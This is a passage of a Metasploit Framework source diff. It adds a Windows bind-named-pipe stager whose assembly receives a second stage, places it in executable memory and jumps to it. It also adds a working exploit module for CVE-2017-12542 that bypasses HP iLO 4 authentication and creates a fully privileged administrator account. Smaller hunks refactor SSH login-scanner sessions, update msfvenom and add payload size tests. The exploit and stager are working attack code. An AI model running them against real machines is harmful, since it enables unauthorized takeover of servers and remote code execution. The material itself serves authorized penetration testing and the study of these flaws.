|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
|
||||||
|
call ebp ; ConnectNamedPipe(hPipe, lpOverlapped)
|
||||||
|
|
||||||
|
; check for failure
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')}
|
||||||
|
call ebp ; GetLastError()
|
||||||
|
cmp eax, 0x217 ; looking for ERROR_PIPE_CONNECTED
|
||||||
|
jz get_stage_size ; success
|
||||||
|
dec esi
|
||||||
|
jz #{cleanup_funk} ; out of retries
|
||||||
|
|
||||||
|
; wait before trying again
|
||||||
|
push #{retry_wait}
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
|
||||||
|
call ebp ; Sleep(millisecs)
|
||||||
|
jmp connect_pipe
|
||||||
|
^
|
||||||
|
|
||||||
|
asm << asm_send_uuid if include_send_uuid
|
||||||
|
|
||||||
|
asm << 'get_stage_size:'
|
||||||
|
|
||||||
|
# For reliability, set pipe state to wait so ReadFile blocks
|
||||||
|
if reliable
|
||||||
|
asm << %Q^
|
||||||
|
push 0
|
||||||
|
mov ecx, esp
|
||||||
|
push 0 ; lpCollectDataTimeout
|
||||||
|
push 0 ; lpMaxCollectionCount
|
||||||
|
push ecx ; lpMode (PIPE_WAIT)
|
||||||
|
push edi ; hPipe
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
|
||||||
|
call ebp ; SetNamedPipeHandleState(hPipe, lpMode, lpMaxCollectionCount, lpCollectDataTimeout)
|
||||||
|
^
|
||||||
|
end
|
||||||
|
|
||||||
|
asm << %Q^
|
||||||
|
; read size of second stage
|
||||||
|
sub esp, 8
|
||||||
|
push 0 ; lpOverlapped
|
||||||
|
lea ebx, [esp+4] ; lpNumberOfBytesRead
|
||||||
|
push ebx
|
||||||
|
push 4 ; nNumberOfBytesToRead
|
||||||
|
lea ecx, [esp+16] ; lpBuffer
|
||||||
|
push ecx
|
||||||
|
push edi ; hPipe
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
|
||||||
|
call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
|
||||||
|
pop eax ; lpNumberOfBytesRead
|
||||||
|
pop esi ; lpBuffer (stage size)
|
||||||
|
^
|
||||||
|
|
||||||
|
if reliable
|
||||||
|
asm << %Q^
|
||||||
|
; check for bytesRead == 4
|
||||||
|
cmp eax, 4 ; expecting 4 bytes
|
||||||
|
jnz cleanup_file
|
||||||
|
^
|
||||||
|
end
|
||||||
|
|
||||||
|
asm << %Q^
|
||||||
|
get_second_stage:
|
||||||
|
; Alloc a RWX buffer for the second stage
|
||||||
|
push 0x40 ; PAGE_EXECUTE_READWRITE
|
||||||
|
push 0x1000 ; MEM_COMMIT
|
||||||
|
push esi ; dwLength
|
||||||
|
push 0 ; NULL as we dont care where the allocation is
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
|
||||||
|
call ebp ; VirtualAlloc(NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
|
||||||
|
^
|
||||||
|
|
||||||
|
if reliable
|
||||||
|
asm << %Q^
|
||||||
|
test eax, eax ; VirtualAlloc returning 0 is an error
|
||||||
|
jz cleanup_file
|
||||||
|
^
|
||||||
|
end
|
||||||
|
|
||||||
|
asm << %Q^
|
||||||
|
push eax ; save stage base address
|
||||||
|
mov ebx, eax ; stage 2 buff ptr
|
||||||
|
|
||||||
|
read_more:
|
||||||
|
; prepare the size min(0x10000, esi)
|
||||||
|
mov edx, #{chunk_size}
|
||||||
|
cmp edx, esi
|
||||||
|
jle read_max ; read chunk_size
|
||||||
|
mov edx, esi ; read remaining bytes
|
||||||
|
read_max:
|
||||||
|
push 0
|
||||||
|
mov ecx, esp
|
||||||
|
push 0 ; lpOverlapped
|
||||||
|
push ecx ; lpNumberOfBytesRead
|
||||||
|
push edx ; nNumberOfBytesToRead
|
||||||
|
push ebx ; lpBuffer
|
||||||
|
push edi ; hPipe
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
|
||||||
|
call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
|
||||||
|
pop edx ; lpNumberOfBytesRead
|
||||||
|
^
|
||||||
|
|
||||||
|
if reliable
|
||||||
|
asm << %Q^
|
||||||
|
; check to see if the read worked
|
||||||
|
test eax, eax
|
||||||
|
jnz read_successful
|
||||||
|
|
||||||
|
; something failed so free up memory
|
||||||
|
pop ecx
|
||||||
|
push 0x4000 ; MEM_DECOMMIT
|
||||||
|
push 0 ; dwSize, 0 to decommit whole block
|
||||||
|
push ecx ; lpAddress
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
|
||||||
|
call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT)
|
||||||
|
|
||||||
|
cleanup_file:
|
||||||
|
; cleanup the pipe handle
|
||||||
|
push edi ; file handle
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
|
||||||
|
call ebp ; CloseHandle(hPipe)
|
||||||
|
|
||||||
|
jmp failure
|
||||||
|
^
|
||||||
|
end
|
||||||
|
|
||||||
|
asm << %Q^
|
||||||
|
read_successful:
|
||||||
|
add ebx, edx ; buffer += bytes_received
|
||||||
|
sub esi, edx ; length -= bytes_received
|
||||||
|
test esi, esi ; check for 0 bytes left
|
||||||
|
jnz read_more ; continue if we have more to read
|
||||||
|
|
||||||
|
pop ecx
|
||||||
|
jmp ecx ; jump into the second stage
|
||||||
|
^
|
||||||
|
|
||||||
|
asm << 'failure:'
|
||||||
|
|
||||||
|
if opts[:exitfunk]
|
||||||
|
asm << %Q^
|
||||||
|
call exitfunk
|
||||||
|
^
|
||||||
|
asm << asm_exitfunk(opts)
|
||||||
|
elsif reliable
|
||||||
|
asm << %Q^
|
||||||
|
call get_kernel32_name
|
||||||
|
db "kernel32", 0x00
|
||||||
|
get_kernel32_name:
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')}
|
||||||
|
call ebp ; GetModuleHandleA("kernel32")
|
||||||
|
|
||||||
|
call get_exit_name
|
||||||
|
db "ExitThread", 0x00
|
||||||
|
get_exit_name: ; lpProcName
|
||||||
|
push eax ; hModule
|
||||||
|
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}
|
||||||
|
call ebp ; GetProcAddress(hModule, "ExitThread")
|
||||||
|
push 0 ; dwExitCode
|
||||||
|
call eax ; ExitProcess(0)
|
||||||
|
^
|
||||||
|
else
|
||||||
|
# run off the end
|
||||||
|
end
|
||||||
|
|
||||||
|
asm
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
|
@ -128,7 +128,7 @@ module Payload::Windows::BindNamedPipe_x64
|
||||||
sub rsp, 16 ; allocate + alignment
|
sub rsp, 16 ; allocate + alignment
|
||||||
mov r9, rsp ; lpNumberOfBytesWritten
|
mov r9, rsp ; lpNumberOfBytesWritten
|
||||||
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
|
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
|
||||||
call rbp
|
call rbp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
|
||||||
add rsp, 16
|
add rsp, 16
|
||||||
^
|
^
|
||||||
end
|
end
|
||||||
|
|
|
@ -0,0 +1,111 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer
|
||||||
|
overflow in the Connection HTTP header handling by the web server.
|
||||||
|
Exploiting this vulnerability gives full access to the REST API, allowing arbitrary
|
||||||
|
accounts creation.
|
||||||
|
},
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'CVE', '2017-12542' ],
|
||||||
|
[ 'BID', '100467' ],
|
||||||
|
[ 'URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us' ],
|
||||||
|
[ 'URL', 'https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html' ]
|
||||||
|
],
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Fabien Perigaud <fabien[dot]perigaud[at]synacktiv[dot]com>'
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'DisclosureDate' => "Aug 24 2017",
|
||||||
|
'DefaultOptions' => { 'SSL' => true }
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(443),
|
||||||
|
OptString.new('USERNAME', [true, 'Username for the new account', Rex::Text.rand_text_alphanumeric(8)]),
|
||||||
|
OptString.new('PASSWORD', [true, 'Password for the new account', Rex::Text.rand_text_alphanumeric(12)])
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
begin
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => '/rest/v1/AccountService/Accounts',
|
||||||
|
'headers' => {
|
||||||
|
"Connection" => Rex::Text.rand_text_alphanumeric(29)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
rescue
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.code == 200 and res.body.include? '"Description":"iLO User Accounts"'
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
end
|
||||||
|
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
print_status("Trying to create account #{datastore["USERNAME"]}...")
|
||||||
|
|
||||||
|
data = {}
|
||||||
|
data["UserName"] = datastore["USERNAME"]
|
||||||
|
data["Password"] = datastore["PASSWORD"]
|
||||||
|
data["Oem"] = {}
|
||||||
|
data["Oem"]["Hp"] = {}
|
||||||
|
data["Oem"]["Hp"]["LoginName"] = datastore["USERNAME"]
|
||||||
|
data["Oem"]["Hp"]["Privileges"] = {}
|
||||||
|
data["Oem"]["Hp"]["Privileges"]["LoginPriv"] = true
|
||||||
|
data["Oem"]["Hp"]["Privileges"]["RemoteConsolePriv"] = true
|
||||||
|
data["Oem"]["Hp"]["Privileges"]["UserConfigPriv"] = true
|
||||||
|
data["Oem"]["Hp"]["Privileges"]["VirtualMediaPriv"] = true
|
||||||
|
data["Oem"]["Hp"]["Privileges"]["VirtualPowerAndResetPriv"] = true
|
||||||
|
data["Oem"]["Hp"]["Privileges"]["iLOConfigPriv"] = true
|
||||||
|
|
||||||
|
begin
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => '/rest/v1/AccountService/Accounts',
|
||||||
|
'ctype' => 'application/json',
|
||||||
|
'headers' => {
|
||||||
|
"Connection" => Rex::Text.rand_text_alphanumeric(29)
|
||||||
|
},
|
||||||
|
'data' => data.to_json()
|
||||||
|
})
|
||||||
|
rescue Rex::ConnectionRefused
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res
|
||||||
|
fail_with(Failure::Unknown, 'Connection failed')
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.body.include? 'InvalidPasswordLength'
|
||||||
|
fail_with(Failure::BadConfig, "Password #{datastore["PASSWORD"]} is too short.")
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.body.include? 'UserAlreadyExist'
|
||||||
|
fail_with(Failure::BadConfig, "Unable to add login #{datastore["USERNAME"]}, user already exists")
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res.code == 201
|
||||||
|
fail_with(Failure::UnexpectedReply, "Unknown error while creating the user. Response: #{res.code}")
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
|
@ -53,11 +53,11 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
datastore['RPORT']
|
datastore['RPORT']
|
||||||
end
|
end
|
||||||
|
|
||||||
def session_setup(result, ssh_socket)
|
def session_setup(result, scanner)
|
||||||
return unless ssh_socket
|
return unless scanner.ssh_socket
|
||||||
|
|
||||||
# Create a new session
|
# Create a new session
|
||||||
conn = Net::SSH::CommandStream.new(ssh_socket)
|
conn = Net::SSH::CommandStream.new(scanner.ssh_socket)
|
||||||
|
|
||||||
merge_me = {
|
merge_me = {
|
||||||
'USERPASS_FILE' => nil,
|
'USERPASS_FILE' => nil,
|
||||||
|
@ -68,31 +68,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
}
|
}
|
||||||
info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
|
info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
|
||||||
s = start_session(self, info, merge_me, false, conn.lsock)
|
s = start_session(self, info, merge_me, false, conn.lsock)
|
||||||
self.sockets.delete(ssh_socket.transport.socket)
|
self.sockets.delete(scanner.ssh_socket.transport.socket)
|
||||||
|
|
||||||
# Set the session platform
|
# Set the session platform
|
||||||
case result.proof
|
s.platform = scanner.get_platform(result.proof)
|
||||||
when /Linux/
|
|
||||||
s.platform = "linux"
|
|
||||||
when /Darwin/
|
|
||||||
s.platform = "osx"
|
|
||||||
when /SunOS/
|
|
||||||
s.platform = "solaris"
|
|
||||||
when /BSD/
|
|
||||||
s.platform = "bsd"
|
|
||||||
when /HP-UX/
|
|
||||||
s.platform = "hpux"
|
|
||||||
when /AIX/
|
|
||||||
s.platform = "aix"
|
|
||||||
when /Win32|Windows/
|
|
||||||
s.platform = "windows"
|
|
||||||
when /Unknown command or computer name/
|
|
||||||
s.platform = "cisco-ios"
|
|
||||||
when /unknown keyword/ # ScreenOS
|
|
||||||
s.platform = "juniper"
|
|
||||||
when /JUNOS Base OS/ #JunOS
|
|
||||||
s.platform = "juniper"
|
|
||||||
end
|
|
||||||
|
|
||||||
s
|
s
|
||||||
end
|
end
|
||||||
|
@ -140,7 +119,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
credential_core = create_credential(credential_data)
|
credential_core = create_credential(credential_data)
|
||||||
credential_data[:core] = credential_core
|
credential_data[:core] = credential_core
|
||||||
create_credential_login(credential_data)
|
create_credential_login(credential_data)
|
||||||
session_setup(result, scanner.ssh_socket)
|
session_setup(result, scanner)
|
||||||
:next_user
|
:next_user
|
||||||
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
|
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
|
||||||
vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
|
vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
|
||||||
|
|
|
@ -68,11 +68,11 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
datastore['RHOST']
|
datastore['RHOST']
|
||||||
end
|
end
|
||||||
|
|
||||||
def session_setup(result, ssh_socket, fingerprint)
|
def session_setup(result, scanner, fingerprint)
|
||||||
return unless ssh_socket
|
return unless scanner.ssh_socket
|
||||||
|
|
||||||
# Create a new session from the socket
|
# Create a new session from the socket
|
||||||
conn = Net::SSH::CommandStream.new(ssh_socket)
|
conn = Net::SSH::CommandStream.new(scanner.ssh_socket)
|
||||||
|
|
||||||
# Clean up the stored data - need to stash the keyfile into
|
# Clean up the stored data - need to stash the keyfile into
|
||||||
# a datastore for later reuse.
|
# a datastore for later reuse.
|
||||||
|
@ -87,31 +87,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
info = "SSH #{result.credential.public}:#{fingerprint} (#{ip}:#{rport})"
|
info = "SSH #{result.credential.public}:#{fingerprint} (#{ip}:#{rport})"
|
||||||
s = start_session(self, info, merge_me, false, conn.lsock)
|
s = start_session(self, info, merge_me, false, conn.lsock)
|
||||||
self.sockets.delete(ssh_socket.transport.socket)
|
self.sockets.delete(scanner.ssh_socket.transport.socket)
|
||||||
|
|
||||||
# Set the session platform
|
# Set the session platform
|
||||||
case result.proof
|
s.platform = scanner.get_platform(result.proof)
|
||||||
when /Linux/
|
|
||||||
s.platform = "linux"
|
|
||||||
when /Darwin/
|
|
||||||
s.platform = "osx"
|
|
||||||
when /SunOS/
|
|
||||||
s.platform = "solaris"
|
|
||||||
when /BSD/
|
|
||||||
s.platform = "bsd"
|
|
||||||
when /HP-UX/
|
|
||||||
s.platform = "hpux"
|
|
||||||
when /AIX/
|
|
||||||
s.platform = "aix"
|
|
||||||
when /Win32|Windows/
|
|
||||||
s.platform = "windows"
|
|
||||||
when /Unknown command or computer name/
|
|
||||||
s.platform = "cisco-ios"
|
|
||||||
when /unknown keyword/ # ScreenOS
|
|
||||||
s.platform = "juniper"
|
|
||||||
when /JUNOS Base OS/ #JunOS
|
|
||||||
s.platform = "juniper"
|
|
||||||
end
|
|
||||||
|
|
||||||
s
|
s
|
||||||
end
|
end
|
||||||
|
@ -164,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
create_credential_login(credential_data)
|
create_credential_login(credential_data)
|
||||||
tmp_key = result.credential.private
|
tmp_key = result.credential.private
|
||||||
ssh_key = SSHKey.new tmp_key
|
ssh_key = SSHKey.new tmp_key
|
||||||
session_setup(result, scanner.ssh_socket, ssh_key.fingerprint)
|
session_setup(result, scanner, ssh_key.fingerprint)
|
||||||
:next_user
|
:next_user
|
||||||
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
|
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
|
||||||
if datastore['VERBOSE']
|
if datastore['VERBOSE']
|
||||||
|
|
|
@ -60,7 +60,7 @@ metadata = {
|
||||||
{'type': 'aka', 'ref': 'ROBOT'},
|
{'type': 'aka', 'ref': 'ROBOT'},
|
||||||
{'type': 'aka', 'ref': 'Adaptive chosen-ciphertext attack'}
|
{'type': 'aka', 'ref': 'Adaptive chosen-ciphertext attack'}
|
||||||
],
|
],
|
||||||
'type': 'scanner.single',
|
'type': 'single_scanner',
|
||||||
'options': {
|
'options': {
|
||||||
'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},
|
'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},
|
||||||
'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 443},
|
'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 443},
|
||||||
|
|
|
@ -23,7 +23,7 @@ metadata = {
|
||||||
{'type': 'aka', 'ref': 'SharknAT&To'},
|
{'type': 'aka', 'ref': 'SharknAT&To'},
|
||||||
{'type': 'aka', 'ref': 'sharknatto'}
|
{'type': 'aka', 'ref': 'sharknatto'}
|
||||||
],
|
],
|
||||||
'type': 'scanner.multi',
|
'type': 'multi_scanner',
|
||||||
'options': {
|
'options': {
|
||||||
'rhosts': {'type': 'address_range', 'description': 'The target address', 'required': True, 'default': None},
|
'rhosts': {'type': 'address_range', 'description': 'The target address', 'required': True, 'default': None},
|
||||||
'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 49152},
|
'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 49152},
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core/handler/bind_named_pipe'
|
||||||
|
require 'msf/core/payload/windows/bind_named_pipe'
|
||||||
|
|
||||||
|
module MetasploitModule
|
||||||
|
|
||||||
|
CachedSize = 336
|
||||||
|
|
||||||
|
include Msf::Payload::Stager
|
||||||
|
include Msf::Payload::Windows::BindNamedPipe
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'Windows x86 Bind Named Pipe Stager',
|
||||||
|
'Description' => 'Listen for a pipe connection (Windows x86)',
|
||||||
|
'Author' => [ 'UserExistsError' ],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
'Handler' => Msf::Handler::BindNamedPipe,
|
||||||
|
'Convention' => 'sockedi', # hPipe
|
||||||
|
'Stager' => { 'RequiresMidstager' => false }
|
||||||
|
))
|
||||||
|
end
|
||||||
|
end
|
53
msfvenom
53
msfvenom
|
@ -1,28 +1,31 @@
|
||||||
#!/usr/bin/env ruby
|
#!/usr/bin/env ruby
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
msfbase = __FILE__
|
|
||||||
while File.symlink?(msfbase)
|
|
||||||
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
|
|
||||||
end
|
|
||||||
|
|
||||||
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
|
|
||||||
require 'msfenv'
|
|
||||||
|
|
||||||
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
|
|
||||||
|
|
||||||
require 'rex'
|
|
||||||
require 'msf/ui'
|
|
||||||
require 'msf/base'
|
|
||||||
require 'msf/core/payload_generator'
|
|
||||||
|
|
||||||
class MsfVenomError < StandardError; end
|
class MsfVenomError < StandardError; end
|
||||||
class HelpError < StandardError; end
|
class HelpError < StandardError; end
|
||||||
class UsageError < MsfVenomError; end
|
class UsageError < MsfVenomError; end
|
||||||
class NoTemplateError < MsfVenomError; end
|
|
||||||
class IncompatibleError < MsfVenomError; end
|
|
||||||
|
|
||||||
require 'optparse'
|
require 'optparse'
|
||||||
|
require 'timeout'
|
||||||
|
|
||||||
|
def require_deps
|
||||||
|
msfbase = __FILE__
|
||||||
|
while File.symlink?(msfbase)
|
||||||
|
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
|
||||||
|
end
|
||||||
|
|
||||||
|
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
|
||||||
|
require 'msfenv'
|
||||||
|
|
||||||
|
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
|
||||||
|
|
||||||
|
require 'rex'
|
||||||
|
require 'msf/ui'
|
||||||
|
require 'msf/base'
|
||||||
|
require 'msf/core/payload_generator'
|
||||||
|
|
||||||
|
@framework_loaded = true
|
||||||
|
end
|
||||||
|
|
||||||
# Creates a new framework object.
|
# Creates a new framework object.
|
||||||
#
|
#
|
||||||
|
@ -30,9 +33,16 @@ require 'optparse'
|
||||||
# @param (see ::Msf::Simple::Framework.create)
|
# @param (see ::Msf::Simple::Framework.create)
|
||||||
# @return [Msf::Framework]
|
# @return [Msf::Framework]
|
||||||
def init_framework(create_opts={})
|
def init_framework(create_opts={})
|
||||||
|
require_deps unless @framework_loaded
|
||||||
|
|
||||||
create_opts[:module_types] ||= [
|
create_opts[:module_types] ||= [
|
||||||
::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP
|
::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP
|
||||||
]
|
]
|
||||||
|
|
||||||
|
create_opts[:module_types].map! do |type|
|
||||||
|
type = Msf.const_get("MODULE_#{type.upcase}")
|
||||||
|
end
|
||||||
|
|
||||||
@framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true))
|
@framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -178,6 +188,7 @@ def parse_args(args)
|
||||||
datastore[k.upcase] = v.to_s
|
datastore[k.upcase] = v.to_s
|
||||||
end
|
end
|
||||||
if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil?
|
if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil?
|
||||||
|
init_framework
|
||||||
datastore['LHOST'] = Rex::Socket.source_address
|
datastore['LHOST'] = Rex::Socket.source_address
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -214,7 +225,7 @@ def payload_stdin
|
||||||
end
|
end
|
||||||
|
|
||||||
def dump_payloads
|
def dump_payloads
|
||||||
init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ])
|
init_framework(:module_types => [ :payload ])
|
||||||
tbl = Rex::Text::Table.new(
|
tbl = Rex::Text::Table.new(
|
||||||
'Indent' => 4,
|
'Indent' => 4,
|
||||||
'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)",
|
'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)",
|
||||||
|
@ -232,7 +243,7 @@ def dump_payloads
|
||||||
end
|
end
|
||||||
|
|
||||||
def dump_encoders(arch = nil)
|
def dump_encoders(arch = nil)
|
||||||
init_framework(:module_types => [ ::Msf::MODULE_ENCODER ])
|
init_framework(:module_types => [ :encoder ])
|
||||||
tbl = Rex::Text::Table.new(
|
tbl = Rex::Text::Table.new(
|
||||||
'Indent' => 4,
|
'Indent' => 4,
|
||||||
'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""),
|
'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""),
|
||||||
|
@ -255,7 +266,7 @@ def dump_encoders(arch = nil)
|
||||||
end
|
end
|
||||||
|
|
||||||
def dump_nops
|
def dump_nops
|
||||||
init_framework(:module_types => [ ::Msf::MODULE_NOP ])
|
init_framework(:module_types => [ :nop ])
|
||||||
tbl = Rex::Text::Table.new(
|
tbl = Rex::Text::Table.new(
|
||||||
'Indent' => 4,
|
'Indent' => 4,
|
||||||
'Header' => "Framework NOPs (#{framework.stats.num_nops} total)",
|
'Header' => "Framework NOPs (#{framework.stats.num_nops} total)",
|
||||||
|
@ -277,7 +288,7 @@ begin
|
||||||
rescue HelpError => e
|
rescue HelpError => e
|
||||||
$stderr.puts e.message
|
$stderr.puts e.message
|
||||||
exit(1)
|
exit(1)
|
||||||
rescue MsfVenomError, Msf::OptionValidateError => e
|
rescue MsfVenomError => e
|
||||||
$stderr.puts "Error: #{e.message}"
|
$stderr.puts "Error: #{e.message}"
|
||||||
exit(1)
|
exit(1)
|
||||||
end
|
end
|
||||||
|
|
|
@ -2643,6 +2643,17 @@ RSpec.describe 'modules/payloads', :content do
|
||||||
reference_name: 'windows/dllinject/bind_ipv6_tcp'
|
reference_name: 'windows/dllinject/bind_ipv6_tcp'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/dllinject/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/dllinject'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/dllinject/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/dllinject/bind_nonx_tcp' do
|
context 'windows/dllinject/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
@ -2961,6 +2972,17 @@ RSpec.describe 'modules/payloads', :content do
|
||||||
reference_name: 'windows/meterpreter/bind_ipv6_tcp_uuid'
|
reference_name: 'windows/meterpreter/bind_ipv6_tcp_uuid'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/meterpreter/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/meterpreter'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/meterpreter/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/meterpreter/bind_nonx_tcp' do
|
context 'windows/meterpreter/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
@ -3223,6 +3245,17 @@ RSpec.describe 'modules/payloads', :content do
|
||||||
reference_name: 'windows/patchupdllinject/bind_ipv6_tcp'
|
reference_name: 'windows/patchupdllinject/bind_ipv6_tcp'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/patchupdllinject/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/patchupdllinject'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/patchupdllinject/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/patchupdllinject/bind_nonx_tcp' do
|
context 'windows/patchupdllinject/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
